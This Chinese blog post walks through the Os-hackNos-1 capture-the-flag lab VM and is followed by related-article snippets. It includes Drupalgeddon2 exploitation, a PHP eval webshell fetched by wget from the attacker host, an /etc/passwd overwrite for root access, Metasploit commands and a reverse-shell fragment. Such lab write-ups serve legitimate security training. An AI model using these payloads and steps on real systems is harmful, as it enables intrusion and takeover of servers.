线下靶机测试:hacknox-1

最新推荐文章于 2023-04-02 22:34:30 发布
最新推荐文章于 2023-04-02 22:34:30 发布
阅读量736 收藏 2
点赞数 1
文章标签: html servlet 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_57567689/article/details/126415456
版权

一、线下靶机的环境配置

在对hacknox攻击实操中,采用Os-hackNos-1.ova的虚拟镜像在Oracle VM VirtualBox打开用来创建靶机的环境配置和实验操作.

1.建立虚拟系统

在Oracle VM VirtualBox界面通过“导入”项查看需要导入的系统,并将虚拟机放入提前设置好的文件夹。

例图如下:

 

找到Os-hackNos-1.ova的文件并打开它。

 

将它放入提前定义好的文件夹:

进行启动,启动完成后,对虚拟机进行配置的修改:

①设置串口为USB1.1(OHCI)控制器

②设置网络混杂模式为全部允许

这样Oracle VM VirtualBox的虚拟就全部配置完成,启动。

二、靶机的扫描和搜索(确定目标[网站/服务器])

在打开虚拟机,并配置完虚拟机后,进入kali Linux黑客操作系统,打开root的最高权限,对Linux系统串接的IP进行扫描和查看,并确定自己虚拟机的ip地址,进行访问和查看来确定目标。

1.扫描kali Linux黑客系统的ip地址

打开kali linux 系统的最高权限,通过扫描“ipconfig”来确定自己系统的ip。

通过搜索得到,自己linux系统的主机地址是:“192.168.1.19”.

2.检索虚拟机沙盒的IP地址

利用nmap中的扫描进行检索,查看可以的用户信息,并来确定虚拟机的IP地址。

Ⅰ这里利用namp的st协议进行扫秒扫描格式如下“ nmap 192.168.1.0/24 -sT ”.

扫描进度的读取速度较慢,需要耐心等待。例图如下:

 

Ⅱ当扫描进度达到100%后,可以得到系统端所有ip系统端的端口,通过对比查看找到沙盒的端口.

例图如下:

 

得到Oracle VM VirtualBox的虚拟机ip地址端口是“192.168.1.39”.

Ⅲ得到端口后,通过“ dirb http://192.168.1.39/ ”访问敏感信息.例图如下:

 

Ⅳ当发现“directory”时,需意识到检索到目录文件,点开目录文件进行访问查看

 

Ⅵ在得到“http://192.168.1.39/drupal/”后,对web服务器进行漏洞挖掘,在最下面发现

”Powered by Drupal“得到解题的关键信息,通过点击查看!!!

 

三、漏洞挖掘

点开后,发现这是一个开源的CMS,也就是“OPEN Content Managent System” ,因此需要寻找关于" Drupal ",也就是找到 Drupal 的web漏洞,即: Drupal exploit ,通过“ Github.com”检索“Drupal exploit”得到web漏洞。

 

1.通过下载得到Drupal 的漏洞,并安装到Linux的操作系统中去.

 

2.在Linux中打开下载的漏洞包,启动root权限,执行命令操作.

Ⅰ:进行“ gem install highline ”的操作攻击命令

 

Ⅱ:完成后,运行“ ./drupalgeddon2.rb ”查看.

 

Ⅲ:运行“ ./drupalgeddon2.rb http://192.168.1.6/drupal/ ”得到控制端接口.

Ⅳ:利用“whoami”查看自己的名称

利用“id”查看自己的权限

Ⅴ:拿到权限后,撰写一句话木马病毒,即网站后门的程序管理系统

”<?php @eval($_POST[sec]);?>“,将木马放入Linux系统的桌面

Ⅵ:将linux的系统桌面8080窗口打开,将123.php进行传输

四、权限维持

可以看到,桌面的IP地址为:http://192.168.1.19:8080/,文件也传输到了web服务器上。

1.将“123.php”也就是”一句话木马“下载在虚拟机也就是靶机。

利用” wget http://192.168.1.19:8080/123.php “下载

例图如下:

2.通过访问”http://192.168.1.39/drupal/123.php“验证一句话木马是否植入浏览器

例图如下:

3.将”http://192.168.1.39/drupal/123.php“在蚁剑中操作执行

例图如下:

4.在蚁剑中进行链接并执行命令

蚁剑中执行”whoami“和”id“进行查看

五、权限提升

1.将”/etc/passwd“下载到本地链接

2.在Linux操作系统中利用” openssl passwd -1 -salt salt wukai0523“对自己的账户进行加密

3.在继续登录”http://192.168.1.19:8080/“查看已经上传的passwd文档

4.在蚁剑中下载将原本的passwd进行覆盖

利用” wget http://192.168.1.19:8080/passwd -O passwd “将原本蚁剑的passwd进行覆盖

例图如下:

 

5.在蚁剑中查看覆盖的passwd

例图如下:

 

六、拿到用户root的信息以及flag版本型号

1.在控制端打开msfconole

例图如下:

 

2.在拥有msf6的端口输入操作指令

Ⅰ:输入:” use exploit/unix/webapp/drupal_drupalgeddon2 “

Ⅱ:输入虚拟机也就是靶机的ip地址:” set rhosts 192.168.1.39“

Ⅲ:输入漏洞检测系统: ”set targeturi /drupal ”

  Ⅳ:最后执行也就是“run”

Ⅴ:得到管理者操作权限,也就是控制者常常看到的

   然后通过执行shell

进入目标的执行命令环境

 利用“ python3 -c 'import pty; pty.spawn("/bin/bash")' ”进入权限管理

Ⅵ:利用“whoami”验证身份

Ⅶ:利用su切换身份到wukai

输入密码:wukai0523进入授权管理系统

Ⅷ:当管理员从www-data到root时,说明已经到达最高权限

七、验证成功

1.找到第一个flag

在/home/james/user.txt中找到第一个flag

2.找到第二个flag

Ⅰ:访问“whoami”确定是最高权限

Ⅱ:利用“cd”改变目录到“root”

Ⅲ:利用“ls”访问

得到文件夹“root.txt”

Ⅳ:利用“cat”访问“root.txt”,得到最后一个flag

凯凯_0523
关注
靶机 Hacknos:1
m0_51811529的博客
08-30 555
靶机1
Vulnhub靶机:AI-Web-1.0
羊柳树的博客
01-20 4447
1.信息收集 使用命令netdiscover寻找靶机IP,发现靶机IP为192.168.1.137。 使用nmap对把目标机进行端口扫描,发现只开启了80端口。 访问80端口,发现页面只有一句话,没什么可利用的信息。 使用 dirsearch -u http://192.168.1.137/对网站目录进行扫描。 2.漏洞探测与利用 尝试访问/server-status/目录,提示无权访问。访问robots.txt文件,出现两个目录。 依次访问这两个目录,提示无权访问。 那么尝试访问/se3reT
靶机Hacknos-1
weixin_50815573的博客
02-21 1748
实验主机:Os-hackerNos靶机一台/Kali linux攻击机一台 实验网络:桥接网络 实验目标:获取靶机的Root权限 难易程度:简单 前期工作: 1:下载Virtualbox虚拟化软件 下载地址:https://www.virtualbox.org/wiki/Downloads 2:下载目标靶机并导入Virtualbox 下载地址:hackNos: Os-hackNos ~ VulnHub 将Os-hackNos-1.ova下载下来之后打开Virtualbox按下快捷键Ctrl
OS-HACKNOS-1
LainWith的博客
12-25 1156
目录介绍信息收集主机发现方法1网站探测目录扫描gobuster目录扫描查看drupal版本搜索EXPRCE-信息收集反弹shell目标1获取james的账密切换身份方法2网站探测dirb 目录扫描dirbuster挖掘drupal目录获取账号密码登录网站msf拿session提权目标2参考 介绍 难度:容易 ——> 中 flag: 两个, 一个是普通用户的user.txt、另外一个是root用户的user.txt 靶机的地址:https://www.vulnhub.com/entry/hacknos-
oscp——Os-hackNos-1
王嘟嘟的博客
02-03 947
0x00 前言 这个是第十九台机子了,感觉有点感觉了,但是还是差一点东西。 54ix5aW96ICB5amG 链接 https://www.vulnhub.com/entry/hacknos-os-hacknos,401/ 0x01 信息收集 ip 端口 0x02 攻击 1.端口 端口无果 2.web 访问80端口 然后进行目录遍历,可以看到一个是一个drupal的cms 先判断下版本 ...
vulnhub靶机 Os-hackNos-1
witwitwiter的博客
08-24 2558
vulnhub靶机 Os-hackNos-1 靶机下载 https://www.vulnhub.com/entry/hacknos-os-hacknos,401 目标为 普通用户的user.txt和root用户的root.txt 靶机配置 在将靶机文件下载下来为Os-hackNos-1.ova 使用vm打开这个ova文件进行导入。导入完成后,若是遇到无法获取ip地址,则需要在启动界面点击shift进入如下界面按下e 向下翻动,将ro改为rw single init=/bin/bash 然后按下 ctr
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub经典靶机:LampSecurity-CTF4
最新发布
12-24
Vulnhub经典靶机:LampSecurity-CTF4
渗透测试靶机:DC-1
prettyX的博客
11-27 6867
GoGoGO!!! 这篇文章是看着大佬的文章,跟着复现,学习思路。一共5个flag,全部找到。 1靶机名字:DC-1,很好找,这里不放链接了。 : ) 2、靶机下载后,我一开始是用VMware Workstation导入的.ova,然后Kali下想扫出DC-1的IP,扫不出来,看了文章的评论,然后安装VirtualBox,导入.ova(说实话,第一次用VirtualBox)。 ...
Hack-nos-1的一次靶场实战练习
m0_58153689的博客
08-26 282
靶机 靶场
20210301HackNos-Os-hackNos-1靶机(第一次打靶机的心得体会和坑)
qq_45290991的博客
03-01 796
文章目录 练习笔记:一,信息收集二,获取目标的shell三,权限维持四,提权root权限维持: Os-hackNos-1靶机 实验主机:kali linux虚拟机(VM) 实验靶机:Os-hackNos-1靶机Virtualbox实验网...
CHill_HACK靶机渗透测试
weixin_49340699的博客
07-23 656
CHill_HACK靶机渗透测试环境工具流程 环境 kali IP 192.168.19.131 靶机 IP 192.168.19.154 工具 netdicover nmap gobuster netcat steghide frackzip base64在线解码 流程 首先使用netdiscover对目标网段进行扫描主机发现 发现目标主机192.168.19.154 nmap对端口扫描信息收集 目标靶机开启了ssh,ftp,http 先从21端口开始收集查看ftp是否存在匿名登录,存在匿名登录,登录
Hack The Box 系列域渗透之靶机Multimaster
二狗的博客
02-03 1780
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第九篇,靶机名字为Multimaster,这是一台疯狂难度的靶机
HackInOS靶机练习
yifujiadeng的博客
04-23 478
HackInOS靶机练习 网络结构: 网络结构由VMware虚拟机及物理机组成 靶机hackinOS:192.168.1.136 Kali:192.168.1.137/24 物理机 信息收集: 主机发现: Nmap扫描: nmap -sP 192.168.1.0/24 此处192.168.1.1为VMnet1网卡地址,1.3为网关地址,1.137为kali的地址,判断靶机地址为192.168.1.136(这里因为原图在保存过程中丢失了,所以我重新扫描了一下放了张图,时间跟后面对不上,但是不妨碍,地
靶机Hacknos-2.1
weixin_50815573的博客
02-21 1393
靶机地址 https://www.vulnhub.com/entry/hacknos-os-hacknos-2,403/# 目标为 普通用户的user.txt和root用户的root.txt 第一步现将我们下载好的靶机导入到VirtualBox中启动靶机 第二步,打开我们的kali 使用 nmap -sP 192.168.1.0/24 搜索内网或者的主机 找到我们的目标靶机ip, 这里有个技巧,通过VirtualBox >>设置 >>网络 >> 高.
Os-HackNos-1靶机渗透过程笔记
qq_51637038的博客
04-02 280
用hackbar向webshell传递post参数(反弹shell的语句我还不太懂怎么写出来的,照搬的网上的语句)rm /tmp/f;在开始渗透前遇到nmap扫不到靶机ip的情况,查找资料后发现问题出在靶机的网关设置有问题,需要先修改interfaces文件中的网关才能使靶机联网(应该是都会遇到这个问题的)其中已知172为kali的ip,54为物理机ip,1为网关ip,故可知192.168.43.36是靶机的ip。查到漏洞CVE-2018-7600,影响范围包括了Drupal 6.x,7.x,8.x版本。
从0开始利用VirtualBox搭建虚拟机靶场
LordRayleigh的博客
10-21 2615
由于目前我需要在一台Linux服务器上搭建一个可以用来做渗透测试的虚拟机仿真网络靶场,由于前期基本没有这方面的经验,就把整个过程写记录下来,方便后面的工作。整体上,需要先配置远程可视化的环境,安装VirtulBox,然后配置路由吗,配置Windows Sever Active Directory,最后利用进行安装多个虚拟机。
Eric靶机渗透测试
weixin_52971422的博客
04-12 3330
Eric靶机渗透练习 攻击机:kali Ip:192.168.0.3 靶机:eric Ip:192.168.0.4 找到靶机ip:192.168.0.4 nmap -sF 192.168.0.0/24 细致的扫描靶机,发现80端口的网站有.git敏感目录,但是不急。 nmap -sV -A -p- 192.168.0.4 -T4 对网站细致的目录枚举 dirb http://192.168.0.4/ 发现有三个敏感目录 一个个好好康康嘿嘿 先admin.ph.
初试DC-1靶机渗透
kimoro_x的博客
04-20 689
1.下载DC-1靶机 2.将DC-1.ova导入到VirtualBox中(具体流程不再赘述) 3.将靶机和kali(我的是在VMware下的)设置在同一网段下(具体步骤可参考此链接 4.用ifconfig查看本机IP 5.用netdiscover -r ip/netmask来探测靶场IP 6.经测试192.168.56.101为目标靶机ip,于是我们可以使用nmap -sV 192.168.5...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值